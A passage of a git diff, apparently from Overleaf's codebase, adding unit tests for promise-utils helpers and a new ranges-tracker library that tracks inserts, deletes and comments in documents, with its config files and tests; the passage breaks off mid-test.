{ + SOME_CONSTANT: 1, + async asyncAdd(a, b) { + return a + b + }, + async asyncDouble(x) { + return await this.asyncAdd(x, x) + }, + dashConcat(a, b) { + return `${a}-${b}` + }, + } + this.callbackified = callbackifyAll(this.module) + }) + + it('callbackifies async functions in the module', function (done) { + this.callbackified.asyncAdd(77, 18, (err, sum) => { + if (err) { + return done(err) + } + expect(sum).to.equal(95) + done() + }) + }) + + it('binds this to the original module', function (done) { + this.callbackified.asyncDouble(20, (err, double) => { + if (err) { + return done(err) + } + expect(double).to.equal(40) + done() + }) + }) + + it('copies over regular functions', function () { + const s = this.callbackified.dashConcat('ping', 'pong') + expect(s).to.equal('ping-pong') + }) + + it('copies over non-functions', function () { + expect(this.callbackified.SOME_CONSTANT).to.equal(1) + }) + }) + + describe('multiResult option', function () { + before(function () { + this.module = { + async asyncAdd(a, b) { + return a + b + }, + async asyncArithmetic(a, b) { + return { sum: a + b, product: a * b } + }, + } + this.callbackified = callbackifyAll(this.module, { + multiResult: { asyncArithmetic: ['sum', 'product'] }, + }) + }) + + it('callbackifies multi-result functions', function (done) { + this.callbackified.asyncArithmetic(4, 5, (err, sum, product) => { + if (err) { + return done(err) + } + expect(sum).to.equal(9) + expect(product).to.equal(20) + done() + }) + }) + + it('callbackifies other functions normally', function (done) { + this.callbackified.asyncAdd(77, 18, (err, sum) => { + if (err) { + return done(err) + } + expect(sum).to.equal(95) + done() + }) + }) + }) + + describe('without option', function () { + before(function () { + this.module = { + async asyncAdd(a, b) { + return a + b + }, + async asyncArithmetic(a, b) { + return { sum: a + b, product: a * b } + }, + } + this.callbackified = callbackifyAll(this.module, { + without: ['asyncAdd'], + }) + }) + + it('does not callbackify excluded functions', function () { + expect(this.callbackified.asyncAdd).not.to.exist + }) + + it('callbackifies other functions', function (done) { + this.callbackified.asyncArithmetic(5, 6, (err, { sum, product }) => { + expect(err).not.to.exist + expect(sum).to.equal(11) + expect(product).to.equal(30) + done() + }) + }) + }) +}) + +describe('callbackifyClass', function () { + describe('basic functionality', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + async asyncAdd(b) { + return this.a + b + } + } + this.Callbackified = callbackifyClass(this.Class) + }) + + it('callbackifies the class methods', function (done) { + const adder = new this.Callbackified(1) + adder.asyncAdd(2, (err, sum) => { + expect(err).not.to.exist + expect(sum).to.equal(3) + done() + }) + }) + }) + + describe('without option', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + async asyncAdd(b) { + return this.a + b + } + + syncAdd(b) { + return this.a + b + } + } + this.Callbackified = callbackifyClass(this.Class, { + without: ['syncAdd'], + }) + }) + + it('does not callbackify excluded functions', function () { + const adder = new this.Callbackified(10) + const sum = adder.syncAdd(12) + expect(sum).to.equal(22) + }) + + it('callbackifies other functions', function (done) { + const adder = new this.Callbackified(1) + adder.asyncAdd(2, (err, sum) => { + expect(err).not.to.exist + expect(sum).to.equal(3) + done() + }) + 
}) + }) + + describe('multiResult option', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + async asyncAdd(b) { + return this.a + b + } + + async asyncArithmetic(b) { + return { sum: this.a + b, product: this.a * b } + } + } + this.Callbackified = callbackifyClass(this.Class, { + multiResult: { asyncArithmetic: ['sum', 'product'] }, + }) + }) + + it('callbackifies multi-result functions', function (done) { + const adder = new this.Callbackified(3) + adder.asyncArithmetic(6, (err, sum, product) => { + expect(err).not.to.exist + expect(sum).to.equal(9) + expect(product).to.equal(18) + done() + }) + }) + + it('callbackifies other functions normally', function (done) { + const adder = new this.Callbackified(6) + adder.asyncAdd(2, (err, sum) => { + expect(err).not.to.exist + expect(sum).to.equal(8) + done() + }) + }) + }) +}) + +describe('expressify', function () { + it('should propagate any rejection to the "next" callback', function (done) { + const fn = () => Promise.reject(new Error('rejected')) + expressify(fn)({}, {}, error => { + expect(error.message).to.equal('rejected') + done() + }) + }) +}) + +describe('expressifyErrorHandler', function () { + it('should propagate any rejection to the "next" callback', function (done) { + const fn = () => Promise.reject(new Error('rejected')) + expressifyErrorHandler(fn)({}, {}, {}, error => { + expect(error.message).to.equal('rejected') + done() + }) + }) +}) diff --git a/libraries/promise-utils/tsconfig.json b/libraries/promise-utils/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/promise-utils/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/ranges-tracker/.gitignore b/libraries/ranges-tracker/.gitignore new file mode 100644 index 0000000..eac2002 --- /dev/null +++ b/libraries/ranges-tracker/.gitignore @@ -0,0 +1,13 @@ +**.swp + +app.js +app/js/ +test/unit/js/ +public/build/ + +node_modules/ + +/public/js/chat.js +plato/ + +.npmrc diff --git a/libraries/ranges-tracker/.nvmrc b/libraries/ranges-tracker/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/ranges-tracker/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/ranges-tracker/buildscript.txt b/libraries/ranges-tracker/buildscript.txt new file mode 100644 index 0000000..d112f85 --- /dev/null +++ b/libraries/ranges-tracker/buildscript.txt @@ -0,0 +1,10 @@ +ranges-tracker +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/ranges-tracker/index.cjs b/libraries/ranges-tracker/index.cjs new file mode 100644 index 0000000..a94e265 --- /dev/null +++ b/libraries/ranges-tracker/index.cjs @@ -0,0 +1,793 @@ +/** + * The purpose of this class is to track a set of inserts and deletes to a document, like + * track changes in Word. We store these as a set of ShareJs style ranges: + * {i: "foo", p: 42} # Insert 'foo' at offset 42 + * {d: "bar", p: 37} # Delete 'bar' at offset 37 + * We only track the inserts and deletes, not the whole document, but by being given all + * updates that are applied to a document, we can update these appropriately. + * + * Note that the set of inserts and deletes we store applies to the document as-is at the moment. 
+ * So inserts correspond to text which is in the document, while deletes correspond to text which + * is no longer there, so their lengths do not affect the position of later offsets. + * E.g. + * this is the current text of the document + * |-----| | + * {i: "current ", p:12} -^ ^- {d: "old ", p: 31} + * + * Track changes rules (should be consistent with Word): + * * When text is inserted at a delete, the text goes to the left of the delete + * I.e. "foo|bar" -> "foobaz|bar", where | is the delete, and 'baz' is inserted + * * Deleting content flagged as 'inserted' does not create a new delete marker, it only + * removes the insert marker. E.g. + * * "abdefghijkl" -> "abfghijkl" when 'de' is deleted. No delete marker added + * |---| <- inserted |-| <- inserted + * * Deletes overlapping regular text and inserted text will insert a delete marker for the + * regular text: + * "abcdefghijkl" -> "abcdejkl" when 'fghi' is deleted + * |----| |--|| + * ^- inserted 'bcdefg' \ ^- deleted 'hi' + * \--inserted 'bcde' + * * Deletes overlapping other deletes are merged. E.g. + * "abcghijkl" -> "ahijkl" when 'bcg' is deleted + * | <- delete 'def' | <- delete 'bcdefg' + * * Deletes by another user will consume deletes by the first user + * * Inserts by another user will not combine with inserts by the first user. If they are in the + * middle of a previous insert by the first user, the original insert will be split into two. + */ +class RangesTracker { + constructor(changes, comments) { + if (changes == null) { + changes = [] + } + this.changes = changes + if (comments == null) { + comments = [] + } + this.comments = comments + this.track_changes = false + this.id_seed = RangesTracker.generateIdSeed() + this.id_increment = 0 + this._dirtyState = { + comment: { + moved: {}, + removed: {}, + added: {}, + }, + change: { + moved: {}, + removed: {}, + added: {}, + }, + } + } + + getIdSeed() { + return this.id_seed + } + + setIdSeed(seed) { + this.id_seed = seed + this.id_increment = 0 + } + + static generateIdSeed() { + // Generate the first 18 characters of a Mongo ObjectId, leaving 6 for the increment part + // Reference: https://github.com/dreampulse/ObjectId.js/blob/master/src/main/javascript/Objectid.js + const pid = Math.floor(Math.random() * 32767).toString(16) + const machine = Math.floor(Math.random() * 16777216).toString(16) + const timestamp = Math.floor(new Date().valueOf() / 1000).toString(16) + return ( + '00000000'.substr(0, 8 - timestamp.length) + + timestamp + + '000000'.substr(0, 6 - machine.length) + + machine + + '0000'.substr(0, 4 - pid.length) + + pid + ) + } + + static generateId() { + return this.generateIdSeed() + '000001' + } + + newId() { + this.id_increment++ + const increment = this.id_increment.toString(16) + const id = + this.id_seed + '000000'.substr(0, 6 - increment.length) + increment + return id + } + + getComment(commentId) { + let comment = null + for (const c of this.comments) { + if (c.id === commentId) { + comment = c + break + } + } + return comment + } + + removeCommentId(commentId) { + const comment = this.getComment(commentId) + if (comment == null) { + return + } + this.comments = this.comments.filter(c => c.id !== commentId) + this._markAsDirty(comment, 'comment', 'removed') + } + + moveCommentId(commentId, position, text) { + for (const comment of this.comments) { + if (comment.id === commentId) { + comment.op.p = position + comment.op.c = text + this._markAsDirty(comment, 'comment', 'moved') + } + } + } + + getChange(changeId) { + let change = null + for (const 
c of this.changes) { + if (c.id === changeId) { + change = c + break + } + } + return change + } + + getChanges(ids) { + const idSet = new Set(ids) + return this.changes.filter(change => idSet.has(change.id)) + } + + removeChangeId(changeId) { + this.removeChangeIds([changeId]) + } + + removeChangeIds(ids) { + if (ids == null || ids.length === 0) { + return + } + + const idSet = new Set(ids) + const remainingChanges = [] + for (const change of this.changes) { + if (idSet.has(change.id)) { + this._markAsDirty(change, 'change', 'removed') + } else { + remainingChanges.push(change) + } + } + + this.changes = remainingChanges + } + + validate(text) { + let content + for (const change of this.changes) { + if (change.op.i != null) { + content = text.slice(change.op.p, change.op.p + change.op.i.length) + if (content !== change.op.i) { + throw new Error('insertion does not match text in document') + } + } + } + for (const comment of this.comments) { + content = text.slice(comment.op.p, comment.op.p + comment.op.c.length) + if (content !== comment.op.c) { + throw new Error('comment does not match text in document') + } + } + } + + applyOp(op, metadata) { + if (metadata == null) { + metadata = {} + } + if (metadata.ts == null) { + metadata.ts = new Date() + } + // Apply an op that has been applied to the document to our changes to keep them up to date + if (op.i != null) { + this.applyInsertToChanges(op, metadata) + this.applyInsertToComments(op) + } else if (op.d != null) { + this.applyDeleteToChanges(op, metadata) + this.applyDeleteToComments(op) + } else if (op.c != null) { + this.addComment(op, metadata) + } else { + throw new Error('unknown op type') + } + } + + applyOps(ops, metadata) { + if (metadata == null) { + metadata = {} + } + for (const op of ops) { + this.applyOp(op, metadata) + } + } + + addComment(op, metadata) { + const existing = this.getComment(op.t) + if (existing != null) { + this.moveCommentId(op.t, op.p, op.c) + } else { + let comment + this.comments.push( + (comment = { + id: op.t || this.newId(), + op: { + // Copy because we'll modify in place + c: op.c, + p: op.p, + t: op.t, + }, + metadata, + }) + ) + this._markAsDirty(comment, 'comment', 'added') + } + } + + applyInsertToComments(op) { + for (const comment of this.comments) { + if (op.p <= comment.op.p) { + comment.op.p += op.i.length + this._markAsDirty(comment, 'comment', 'moved') + } else if (op.p < comment.op.p + comment.op.c.length) { + const offset = op.p - comment.op.p + comment.op.c = + comment.op.c.slice(0, +(offset - 1) + 1 || undefined) + + op.i + + comment.op.c.slice(offset) + this._markAsDirty(comment, 'comment', 'moved') + } + } + } + + applyDeleteToComments(op) { + const opStart = op.p + const opLength = op.d.length + const opEnd = op.p + opLength + for (const comment of this.comments) { + const commentStart = comment.op.p + const commentEnd = comment.op.p + comment.op.c.length + const commentLength = commentEnd - commentStart + if (opEnd <= commentStart) { + // delete is fully before comment + comment.op.p -= opLength + this._markAsDirty(comment, 'comment', 'moved') + } else if (opStart >= commentEnd) { + // delete is fully after comment, nothing to do + } else { + // delete and comment overlap + let remainingAfter, remainingBefore + if (opStart <= commentStart) { + remainingBefore = '' + } else { + remainingBefore = comment.op.c.slice(0, opStart - commentStart) + } + if (opEnd >= commentEnd) { + remainingAfter = '' + } else { + remainingAfter = comment.op.c.slice(opEnd - commentStart) + } + + // Check 
deleted content matches delete op + const deletedComment = comment.op.c.slice( + remainingBefore.length, + commentLength - remainingAfter.length + ) + const offset = Math.max(0, commentStart - opStart) + const deletedOpContent = op.d + .slice(offset) + .slice(0, deletedComment.length) + if (deletedComment !== deletedOpContent) { + throw new Error('deleted content does not match comment content') + } + + comment.op.p = Math.min(commentStart, opStart) + comment.op.c = remainingBefore + remainingAfter + this._markAsDirty(comment, 'comment', 'moved') + } + } + } + + applyInsertToChanges(op, metadata) { + let change + const opStart = op.p + const opLength = op.i.length + const opEnd = op.p + opLength + const undoing = !!op.u + + let alreadyMerged = false + let previousChange = null + const movedChanges = [] + const removeChanges = [] + const newChanges = [] + const trackedDeletesAtOpPosition = [] + for (let i = 0; i < this.changes.length; i++) { + change = this.changes[i] + const changeStart = change.op.p + + if (change.op.d != null) { + // Shift any deletes after this along by the length of this insert + if (opStart < changeStart) { + change.op.p += opLength + movedChanges.push(change) + } else if (opStart === changeStart) { + if ( + !alreadyMerged && + undoing && + change.op.d.length >= op.i.length && + change.op.d.slice(0, op.i.length) === op.i + ) { + // If we are undoing, then we want to reject any existing tracked delete if we can. + // Check if the insert matches the start of the delete, and just + // remove it from the delete instead if so. + change.op.d = change.op.d.slice(op.i.length) + change.op.p += op.i.length + if (change.op.d === '') { + removeChanges.push(change) + } else { + movedChanges.push(change) + } + alreadyMerged = true + + // Any tracked delete that came before this tracked delete + // rejection was moved after the incoming insert. Move them back + // so that they appear before the tracked delete rejection. + for (const trackedDelete of trackedDeletesAtOpPosition) { + trackedDelete.op.p -= opLength + } + } else { + // We're not rejecting that tracked delete. Move it after the + // insert. + change.op.p += opLength + movedChanges.push(change) + + // Keep track of tracked deletes that are at the same position as the + // insert. If we find a tracked delete to reject, we'll want to + // reposition them. + if (!alreadyMerged) { + trackedDeletesAtOpPosition.push(change) + } + } + } + } else if (change.op.i != null) { + let offset + const changeEnd = changeStart + change.op.i.length + const isChangeOverlapping = + opStart >= changeStart && opStart <= changeEnd + + // Only merge inserts if they are from the same user + const isSameUser = metadata.user_id === change.metadata.user_id + + // If we are undoing, then our changes will be removed from any delete ops just after. In that case, if there is also + // an insert op just before, then we shouldn't append it to this insert, but instead only cancel the following delete. + // E.g. + // foo|<--- about to insert 'b' here + // inserted 'foo' --^ ^-- deleted 'bar' + // should become just 'foo' not 'foob' (with the delete marker becoming just 'ar'). 
+ const nextChange = this.changes[i + 1] + const isOpAdjacentToNextDelete = + nextChange != null && + nextChange.op.d != null && + op.p === changeEnd && + nextChange.op.p === op.p + const willOpCancelNextDelete = + undoing && + isOpAdjacentToNextDelete && + nextChange.op.d.slice(0, op.i.length) === op.i + + // If there is a delete at the start of the insert, and we're inserting + // at the start, we SHOULDN'T merge since the delete acts as a partition. + // The previous op will be the delete, but it's already been shifted by this insert + // + // I.e. + // Originally: |-- existing insert --| + // | <- existing delete at same offset + // + // Now: |-- existing insert --| <- not shifted yet + // |-- this insert --|| <- existing delete shifted along to end of this op + // + // After: |-- existing insert --| + // |-- this insert --|| <- existing delete + // + // Without the delete, the inserts would be merged. + const isInsertBlockedByDelete = + previousChange != null && + previousChange.op.d != null && + previousChange.op.p === opEnd + + // If the insert is overlapping another insert, either at the beginning in the middle or touching the end, + // then we merge them into one. + if ( + this.track_changes && + isChangeOverlapping && + !isInsertBlockedByDelete && + !alreadyMerged && + !willOpCancelNextDelete && + isSameUser + ) { + offset = opStart - changeStart + change.op.i = + change.op.i.slice(0, offset) + op.i + change.op.i.slice(offset) + change.metadata.ts = metadata.ts + alreadyMerged = true + movedChanges.push(change) + } else if (opStart <= changeStart) { + // If we're fully before the other insert we can just shift the other insert by our length. + // If they are touching, and should have been merged, they will have been above. + // If not merged above, then it must be blocked by a delete, and will be after this insert, so we shift it along as well + change.op.p += opLength + movedChanges.push(change) + } else if ( + (!isSameUser || !this.track_changes) && + changeStart < opStart && + opStart < changeEnd + ) { + // This user is inserting inside a change by another user, so we need to split the + // other user's change into one before and after this one. + offset = opStart - changeStart + const beforeContent = change.op.i.slice(0, offset) + const afterContent = change.op.i.slice(offset) + + // The existing change can become the 'before' change + change.op.i = beforeContent + movedChanges.push(change) + + // Create a new op afterwards + const afterChange = { + op: { + i: afterContent, + p: changeStart + offset + opLength, + }, + metadata: {}, + } + for (const key in change.metadata) { + const value = change.metadata[key] + afterChange.metadata[key] = value + } + newChanges.push(afterChange) + } + } + + previousChange = change + } + + if (this.track_changes && !alreadyMerged) { + this._addOp(op, metadata) + } + for ({ op, metadata } of newChanges) { + this._addOp(op, metadata) + } + + for (change of removeChanges) { + this._removeChange(change) + } + + for (change of movedChanges) { + this._markAsDirty(change, 'change', 'moved') + } + } + + applyDeleteToChanges(op, metadata) { + const opStart = op.p + const opLength = op.d.length + const opEnd = op.p + opLength + const removeChanges = [] + let movedChanges = [] + + // We might end up modifying our delete op if it merges with existing deletes, or cancels out + // with an existing insert. 
Since we might do multiple modifications, we record them and do + // all the modifications after looping through the existing changes, so as not to mess up the + // offset indexes as we go. + const opModifications = [] + for (const change of this.changes) { + let changeStart + if (change.op.i != null) { + changeStart = change.op.p + const changeEnd = changeStart + change.op.i.length + if (opEnd <= changeStart) { + // Shift ops after us back by our length + change.op.p -= opLength + movedChanges.push(change) + } else if (opStart >= changeEnd) { + // Delete is after insert, nothing to do + } else { + // When the new delete overlaps an insert, we should remove the part of the insert that + // is now deleted, and also remove the part of the new delete that overlapped. I.e. + // the two cancel out where they overlap. + let deleteRemainingAfter, + deleteRemainingBefore, + insertRemainingAfter, + insertRemainingBefore + if (opStart >= changeStart) { + // |-- existing insert --| + // insertRemainingBefore -> |.....||-- new delete --| + deleteRemainingBefore = '' + insertRemainingBefore = change.op.i.slice(0, opStart - changeStart) + } else { + // deleteRemainingBefore -> |.....||-- existing insert --| + // |-- new delete --| + deleteRemainingBefore = op.d.slice(0, changeStart - opStart) + insertRemainingBefore = '' + } + + if (opEnd <= changeEnd) { + // |-- existing insert --| + // |-- new delete --||.....| <- insertRemainingAfter + deleteRemainingAfter = '' + insertRemainingAfter = change.op.i.slice(opEnd - changeStart) + } else { + // |-- existing insert --||.....| <- deleteRemainingAfter + // |-- new delete --| + deleteRemainingAfter = op.d.slice(changeEnd - opStart) + insertRemainingAfter = '' + } + + const insertRemaining = insertRemainingBefore + insertRemainingAfter + if (insertRemaining.length > 0) { + change.op.i = insertRemaining + change.op.p = Math.min(changeStart, opStart) + movedChanges.push(change) + } else { + removeChanges.push(change) + } + + // We know what we want to preserve of our delete op before (deleteRemainingBefore) and what we want to preserve + // afterwards (deleteRemainingAfter). Now we need to turn that into a modification which deletes the + // chunk in the middle not covered by these. + const deleteRemovedLength = + op.d.length - + deleteRemainingBefore.length - + deleteRemainingAfter.length + const deleteRemovedStart = deleteRemainingBefore.length + const modification = { + d: op.d.slice( + deleteRemovedStart, + deleteRemovedStart + deleteRemovedLength + ), + p: deleteRemovedStart, + } + if (modification.d.length > 0) { + opModifications.push(modification) + } + } + } else if (change.op.d != null) { + changeStart = change.op.p + if ( + opEnd < changeStart || + (!this.track_changes && opEnd === changeStart) + ) { + // Shift ops after us back by our length. + // If we're tracking changes, it must be strictly before, since we'll merge + // below if they are touching. Otherwise, touching is fine. + change.op.p -= opLength + movedChanges.push(change) + } else if (opStart <= changeStart && changeStart <= opEnd) { + if (this.track_changes) { + // If we overlap a delete, add it in our content, and delete the existing change. + // It's easier to do it this way, rather than modifying the existing delete in case + // we overlap many deletes and we'd need to track that. We have a workaround to + // update the delete in place if possible below. 
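+                // For example (restating the merge rule from the class-level
+                // comment above): deleting 'bcg' across an existing tracked
+                // delete of 'def' leaves one tracked delete of 'bcdefg'.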
+ const offset = changeStart - opStart + opModifications.push({ i: change.op.d, p: offset }) + removeChanges.push(change) + } else { + change.op.p = opStart + movedChanges.push(change) + } + } + } + + // Copy rather than modify because we still need to apply it to comments + op = { + p: op.p, + d: this._applyOpModifications(op.d, opModifications), + } + + for (const change of removeChanges) { + // This is a bit of a hack to avoid removing one delete and replacing it with another. + // If we don't do this, it causes the UI to flicker + if ( + op.d.length > 0 && + change.op.d != null && + op.p <= change.op.p && + change.op.p <= op.p + op.d.length + ) { + change.op.p = op.p + change.op.d = op.d + change.metadata = metadata + movedChanges.push(change) + op.d = '' // stop it from being added + } else { + this._removeChange(change) + } + } + + if (this.track_changes && op.d.length > 0) { + this._addOp(op, metadata) + } else { + // It's possible that we deleted an insert between two other inserts. I.e. + // If we delete 'user_2 insert' in: + // |-- user_1 insert --||-- user_2 insert --||-- user_1 insert --| + // it becomes: + // |-- user_1 insert --||-- user_1 insert --| + // We need to merge these together again + const results = this._scanAndMergeAdjacentUpdates() + movedChanges = movedChanges.concat(results.movedChanges) + for (const change of results.removeChanges) { + this._removeChange(change) + movedChanges = movedChanges.filter(c => c !== change) + } + } + + for (const change of movedChanges) { + this._markAsDirty(change, 'change', 'moved') + } + } + + _addOp(op, metadata) { + // Don't take a reference to the existing op since we'll modify this in place with future changes + op = this._clone(op) + const change = { + id: this.newId(), + op, + metadata: this._clone(metadata), + } + this.changes.push(change) + + // Keep ops in order of offset, with deletes before inserts + this.changes.sort(function (c1, c2) { + const result = c1.op.p - c2.op.p + if (result !== 0) { + return result + } else if (c1.op.i != null && c2.op.d != null) { + return 1 + } else if (c1.op.d != null && c2.op.i != null) { + return -1 + } else { + return 0 + } + }) + + this._markAsDirty(change, 'change', 'added') + } + + _removeChange(change) { + this.changes = this.changes.filter(c => c !== change) + this._markAsDirty(change, 'change', 'removed') + } + + _applyOpModifications(content, opModifications) { + // Put in descending position order, with deleting first if at the same offset + // (Inserting first would modify the content that the delete will delete) + opModifications.sort(function (a, b) { + const result = b.p - a.p + if (result !== 0) { + return result + } else if (a.i != null && b.d != null) { + return 1 + } else if (a.d != null && b.i != null) { + return -1 + } else { + return 0 + } + }) + + for (const modification of opModifications) { + if (modification.i != null) { + content = + content.slice(0, modification.p) + + modification.i + + content.slice(modification.p) + } else if (modification.d != null) { + if ( + content.slice( + modification.p, + modification.p + modification.d.length + ) !== modification.d + ) { + throw new Error('deletion does not match text in document') + } + content = + content.slice(0, modification.p) + + content.slice(modification.p + modification.d.length) + } + } + return content + } + + _scanAndMergeAdjacentUpdates() { + // This should only need calling when deleting an update between two + // other updates. 
There's no other way to get two adjacent updates from the + // same user, since they would be merged on insert. + let previousChange = null + const removeChanges = [] + const movedChanges = [] + for (const change of this.changes) { + if (previousChange?.op.i != null && change.op.i != null) { + const previousChangeEnd = + previousChange.op.p + previousChange.op.i.length + const previousChangeUserId = previousChange.metadata.user_id + const changeStart = change.op.p + const changeUserId = change.metadata.user_id + if ( + previousChangeEnd === changeStart && + previousChangeUserId === changeUserId + ) { + removeChanges.push(change) + previousChange.op.i += change.op.i + movedChanges.push(previousChange) + } + } else if ( + previousChange?.op.d != null && + change.op.d != null && + previousChange?.op.p === change.op.p + ) { + // Merge adjacent deletes + previousChange.op.d += change.op.d + removeChanges.push(change) + movedChanges.push(previousChange) + } else { + // Only update to the current change if we haven't removed it. + previousChange = change + } + } + return { movedChanges, removeChanges } + } + + resetDirtyState() { + this._dirtyState = { + comment: { + moved: {}, + removed: {}, + added: {}, + }, + change: { + moved: {}, + removed: {}, + added: {}, + }, + } + } + + getDirtyState() { + return this._dirtyState + } + + getTrackedDeletesLength() { + let length = 0 + for (const change of this.changes) { + if (change.op.d != null) { + length += change.op.d.length + } + } + return length + } + + _markAsDirty(object, type, action) { + this._dirtyState[type][action][object.id] = object + } + + _clone(object) { + const clone = {} + for (const k in object) { + const v = object[k] + clone[k] = v + } + return clone + } +} + +module.exports = RangesTracker diff --git a/libraries/ranges-tracker/package.json b/libraries/ranges-tracker/package.json new file mode 100644 index 0000000..8aa0a00 --- /dev/null +++ b/libraries/ranges-tracker/package.json @@ -0,0 +1,26 @@ +{ + "name": "@overleaf/ranges-tracker", + "description": "Shared logic for syncing comments and tracked changes with operational transforms", + "main": "index.cjs", + "files": [ + "index.cjs", + "types" + ], + "author": "Overleaf (https://www.overleaf.com)", + "private": true, + "scripts": { + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } +} diff --git a/libraries/ranges-tracker/test/unit/ranges-tracker-test.js b/libraries/ranges-tracker/test/unit/ranges-tracker-test.js new file mode 100644 index 0000000..d207349 --- /dev/null +++ b/libraries/ranges-tracker/test/unit/ranges-tracker-test.js @@ -0,0 +1,225 @@ +const { expect } = require('chai') +const RangesTracker = require('../..') + +describe('RangesTracker', function () { + describe('with duplicate change ids', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { id: 'id1', op: { p: 1, i: 'hello' } }, + { id: 'id2', op: { p: 10, i: 'world' } }, + { id: 'id3', op: { p: 20, i: '!!!' 
} }, + { id: 'id1', op: { p: 30, d: 'duplicate' } }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it('getChanges() returns all changes with the given ids', function () { + expect(this.rangesTracker.getChanges(['id1', 'id2'])).to.deep.equal([ + this.changes[0], + this.changes[1], + this.changes[3], + ]) + }) + + it('removeChangeIds() removes all changes with the given ids', function () { + this.rangesTracker.removeChangeIds(['id1', 'id2']) + expect(this.rangesTracker.changes).to.deep.equal([this.changes[2]]) + }) + }) + + describe('with duplicate tracked insert ids', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { id: 'id1', op: { p: 10, i: 'one' } }, + { id: 'id1', op: { p: 20, i: 'two' } }, + { id: 'id1', op: { p: 30, d: 'three' } }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it("deleting one tracked insert doesn't delete the others", function () { + this.rangesTracker.applyOp({ p: 20, d: 'two' }) + expect(this.rangesTracker.changes).to.deep.equal([ + this.changes[0], + this.changes[2], + ]) + }) + }) + + describe('with duplicate tracked delete ids', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { id: 'id1', op: { p: 10, d: 'one' } }, + { id: 'id1', op: { p: 20, d: 'two' } }, + { id: 'id1', op: { p: 30, d: 'three' } }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it('deleting over tracked deletes in tracked changes mode removes the tracked deletes covered', function () { + this.rangesTracker.track_changes = true + this.rangesTracker.applyOp({ + p: 15, + d: '567890123456789012345', + }) + expect(this.rangesTracker.changes.map(c => c.op)).to.deep.equal([ + { p: 10, d: 'one' }, + { p: 15, d: '56789two0123456789three012345' }, + ]) + }) + + it('a tracked delete between two tracked deletes joins them into a single tracked delete', function () { + this.rangesTracker.track_changes = true + this.rangesTracker.applyOp({ + p: 20, + d: '0123456789', + }) + expect(this.rangesTracker.changes.map(c => c.op)).to.deep.equal([ + { p: 10, d: 'one' }, + { p: 20, d: 'two0123456789three' }, + ]) + }) + + it("rejecting one tracked delete doesn't reject the others", function () { + this.rangesTracker.track_changes = true + this.rangesTracker.applyOp({ + p: 20, + i: 'two', + u: true, + }) + expect(this.rangesTracker.changes.map(c => c.op)).to.deep.equal([ + { p: 10, d: 'one' }, + { p: 33, d: 'three' }, + ]) + }) + + it("rejecting all tracked deletes doesn't introduce tracked inserts", function () { + this.rangesTracker.track_changes = true + this.rangesTracker.applyOp({ + p: 10, + i: 'one', + u: true, + }) + this.rangesTracker.applyOp({ + p: 23, + i: 'two', + u: true, + }) + this.rangesTracker.applyOp({ + p: 36, + i: 'three', + u: true, + }) + expect(this.rangesTracker.changes.map(c => c.op)).to.deep.equal([]) + }) + }) + + describe('with multiple tracked deletes at the same position', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { id: 'id1', op: { p: 33, d: 'before' } }, + { id: 'id2', op: { p: 50, d: 'right before' } }, + { id: 'id3', op: { p: 50, d: 'this one' } }, + { id: 'id4', op: { p: 50, d: 'right after' } }, + { id: 'id5', op: { p: 75, d: 'long after' } }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it('preserves the text order when rejecting changes', function () { + this.rangesTracker.applyOp( + { p: 50, i: 'this one', u: true }, + { 
user_id: 'user-id' } + ) + expect(this.rangesTracker.changes).to.deep.equal([ + { id: 'id1', op: { p: 33, d: 'before' } }, + { id: 'id2', op: { p: 50, d: 'right before' } }, + { id: 'id4', op: { p: 58, d: 'right after' } }, + { id: 'id5', op: { p: 83, d: 'long after' } }, + ]) + }) + + it('moves all tracked deletes after the insert if not rejecting changes', function () { + this.rangesTracker.applyOp( + { p: 50, i: 'some other text', u: true, orderedRejections: true }, + { user_id: 'user-id' } + ) + expect(this.rangesTracker.changes).to.deep.equal([ + { id: 'id1', op: { p: 33, d: 'before' } }, + { id: 'id2', op: { p: 65, d: 'right before' } }, + { id: 'id3', op: { p: 65, d: 'this one' } }, + { id: 'id4', op: { p: 65, d: 'right after' } }, + { id: 'id5', op: { p: 90, d: 'long after' } }, + ]) + }) + }) + + describe('with multiple tracked deletes at the same position with the same content', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { id: 'id1', op: { p: 10, d: 'cat' } }, + { id: 'id2', op: { p: 10, d: 'giraffe' } }, + { id: 'id3', op: { p: 10, d: 'cat' } }, + { id: 'id4', op: { p: 10, d: 'giraffe' } }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it('removes only the first matching tracked delete', function () { + this.rangesTracker.applyOp( + { p: 10, i: 'giraffe', u: true }, + { user_id: 'user-id' } + ) + expect(this.rangesTracker.changes).to.deep.equal([ + { id: 'id1', op: { p: 10, d: 'cat' } }, + { id: 'id3', op: { p: 17, d: 'cat' } }, + { id: 'id4', op: { 